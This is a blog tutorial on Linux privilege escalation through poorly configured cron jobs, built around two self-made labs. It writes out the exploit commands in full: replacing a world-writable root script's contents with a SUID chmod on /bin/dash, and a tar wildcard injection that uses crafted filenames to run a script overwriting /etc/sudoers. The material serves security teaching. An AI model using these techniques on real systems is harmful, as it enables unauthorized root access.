After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “Privilege Escalation by exploiting Cron Jobs” to gain root access of a remote host machine and also examine how a bad implement cron job can lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.
For details, you can read our previous article where we had applied this trick for privilege escalation. Open the links given below:
Link1: Hack the Box Challenge: Europa Walkthrough
Link2: Hack the Milnet VM (CTF Challenge)
Table of content
- Introduction
- Cron job
- Crontab syntax
- Crontab File overwrite
- Lab Setup (Ubuntu)
- Exploiting cron job (Kali Linux)
- Crontab Tar wildcard Injection
- Lab Setup (Ubuntu)
- Exploiting cron job (Kali Linux)
Let’s Start!!!
What is cron job?
Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They’re most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on. The word Cron comes from crontab and it is present inside /etc directory.
For example: Inside crontab we can add following entry to print apache error logs automatically in every 1 hour.
1 0 * * * printf "" > /var/log/apache/error_log
Crontab File overwrite
Lab Setup for Poorly configured cron job
Objective: Set a new job with help of crontab to run a python script which will erase all data from in a particular directory.
Let assume “cleanup” is the directory whose data will be cleared automatically in every two minutes. Thus we have saved some data inside /home/cleanup.
mkdir cleanup cd cleanup echo "hello freinds" > 1.txt echo "ALL files will be deleted in 2 mints" > 2.txt echo "" > 1.php echo "" > 2.php ls
As you can observe from given image some files are stored inside cleanup directory.
Now write a python program in any other directory to delete data from inside /home/cleanup and give it all permission.
cd /tmp nano cleanup.py
#!/usr/bin/env python import os import sys try: os.system('rm -r /home/cleanup/* ') except: sys.exit()
chmod 777 cleanup.py
At last schedule a task with help of crontab to run cleanup.py for every 2 minutes.
nano /etc/crontab */2 * * * * root /tmp /cleanup.py
Now let’s verify the objectives
cd /home/cleanup ls date ls
Coool!! It is working, as you can see all file has been deleted after two minutes.
Post Exploitation
Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Execute the following command as shown below.
cat /etc/crontab ls -al /tmp/cleanup.py cat /tmp/cleanup.py
From above steps, we notice the crontab is running python script in every two minutes now let’s exploit.
There so many methods to gain root access as in this method we enabled SUID bits /bin/dash. It is quite simple, first, open the file through some editor, for example, nanocleanup.py and replace “rm -r /tmp/*” from the following line as given below
os.system('chmod u+s /bin/dash')
After two minutes it will set SUID permission for /bin/dash and when you will run it will give root access.
/bin/dash id whoami
Awesome!! We hit the Goal…………………
Crontab Tar Wildcard Injection
Lab Setup
Objective: schedule a task with help of crontab to take backup with tar archival program of HTML directory.
The directory should have executable permission whose backup you are going to take.
Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.
nano /etc/crontab */1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
Let’s verify the schedule is working or not by executing following command.
cd /var/backup ls date
From given below image you can notice the html.tgz file has been generated after 1 minute.
Post Exploitation
Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.
cat /etc/crontab
Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.
Execute following command to grant sudo right to logged user and following post exploitation is known as wildcard injection.
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' >test.sh echo "" > "--checkpoint-action=exec=sh test.sh" echo "" > --checkpoint=1 tar cf archive.tar *
Now after 1 minute it will grant sudo right to the user: ignite as you can confirm this with the given below image.
sudo -l sudo bash whoami
YUPPIEEEE!!! We have successfully obtained root access.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
The post Linux Privilege Escalation by Exploiting Cronjobs appeared first on Hacking Articles.